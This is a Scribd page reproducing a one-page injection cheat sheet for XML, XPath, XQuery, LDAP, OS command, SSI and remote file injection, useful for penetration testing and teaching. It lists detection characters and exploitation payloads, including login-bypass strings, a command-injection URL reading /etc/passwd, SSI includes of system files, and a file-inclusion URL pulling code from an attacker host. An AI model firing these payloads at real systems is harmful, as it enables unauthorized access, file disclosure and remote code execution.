Scribd Logo
Upload

Welcome to Scribd!

  • Injection Non-SQL Cheat Sheet

    Uploaded by

    descarao
    49 views1 page
    This document provides a cheat sheet on various injection techniques such as SQL, XML, LDAP, and OS Command Injection with information on detection and exploitation methods. Detection methods are listed for each type of injection including common characters and syntax to look for. Exploitation examples are also given demonstrating how to perform actions like bypassing logins, adding unauthorized users, and executing remote commands or accessing files.

    Original Description:

    cheat sheet sql injection

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    This document provides a cheat sheet on various injection techniques such as SQL, XML, LDAP, and OS Command Injection with information on detection and exploitation methods. Detection methods are listed for each type of injection including common characters and syntax to look for. Exploitation examples are also given demonstrating how to perform actions like bypassing logins, adding unauthorized users, and executing remote commands or accessing files.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    49 views1 page

    Injection Non-SQL Cheat Sheet

    Uploaded by

    descarao
    This document provides a cheat sheet on various injection techniques such as SQL, XML, LDAP, and OS Command Injection with information on detection and exploitation methods. Detection methods are listed for each type of injection including common characters and syntax to look for. Exploitation examples are also given demonstrating how to perform actions like bypassing logins, adding unauthorized users, and executing remote commands or accessing files.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    of 1

    INJECTION CHEAT SHEET (non-SQL)

    XML Injection
    Detection

    single quote

    double quote

    XPATH Injection

    <>

    angular parentheses

    Detection

    <!--/-->

    XML Comment tag

    single quote

    &

    ampersand

    double quote

    <![CDATA[ / ]]>

    CDATA section delimiters

    www.rapid7.com

    Exploitation

    Exploitation

    or 1=1 or =

    <!-- EXISTING TAG -->

    New value of existing tag along with tag name

    ] | * | user[@role=admin

    Add user as administrator

    NODENAME

    returns all children of node

    //NODENAME

    returns all elements in the document

    http://www.example.com/addUser.php?us
    ername=dan&password=123456<!--email:
    --><userid>0</userid><mail>foo@emaildomain.com

    NODENAME//SUBNODENAME

    returns all SUBNODE under NODE element

    OS Command Injection

    //NODENAME/[NAME=VALUE]

    returns all NODE that have a NAME child


    equal to VALUE

    Detection

    http://site.com/login.
    aspx?username=foo or 1=1 or =

    Login bypass

    LDAP Injection

    | <ANOTHER COMMAND>

    Pipe - On *NIX Output of first command to another,


    In Windows multiple commands execution

    ; <ANOTHER COMMAND>

    semicolon - Running two commands together

    Exploitation

    Detection

    %<ENV VARIABLE>%

    Windows only

    opening bracket

    &

    Running command in background (*NIX Only)

    closing bracket

    Displays content of /etc/passwd file

    Pipe - OR operator for LDAP

    ://site.com/whois.php?domain=foobar;
    echo+/etc/passwd

    &

    Ampersand - AND operator for LDAP

    XQuery Injection

    Exclamation - NOT operator for LDAP

    Detection

    Exploitation

    single quote

    (&(param1=val1)(param2=val2))

    AND operator

    double quote

    (|(param1=val1)(param2=val2))

    OR operator

    Exploitation

    *)(ObjectClass=*))
    (&(objectClass=void

    Blind LDAP Injection using AND operator

    or <ATTACK> or .=

    void)(ObjectClass=void))(&(objectClass=void

    BLIND LDAP Injection using OR operator

    http://site.com/ldapsearch?user=*

    Displays list of all users with attributes

    something or =

    Remote Code Injection

    Displays list of all users with attributes

    SSI Injection
    Detection

    Upload File
    Upload file
    PHP, JSP, ASP etc.

    Injecting active content

    execution!

    Access back from webroot

    Remote file inclusion/injection


    include($incfile);

    http://site.com/xmlsearch?user=foo or =

    Look for word

    .SHTML

    File extension

    Exploitation
    < ! # = / . - > and [a-zA-Z0-9]

    Required characters for successful execution

    <!--#include virtual=<SOME SYSTEM FILE > -->

    PHP call

    http://site.com/page.php?file=http://www.attacker.com/exploit

    include, echo, exec

    Injecting

    http://site.com/ssiform.php?showfile=<!-#include virtual=/etc/passwd -->

    Displays content of /etc/passwd file

    You might also like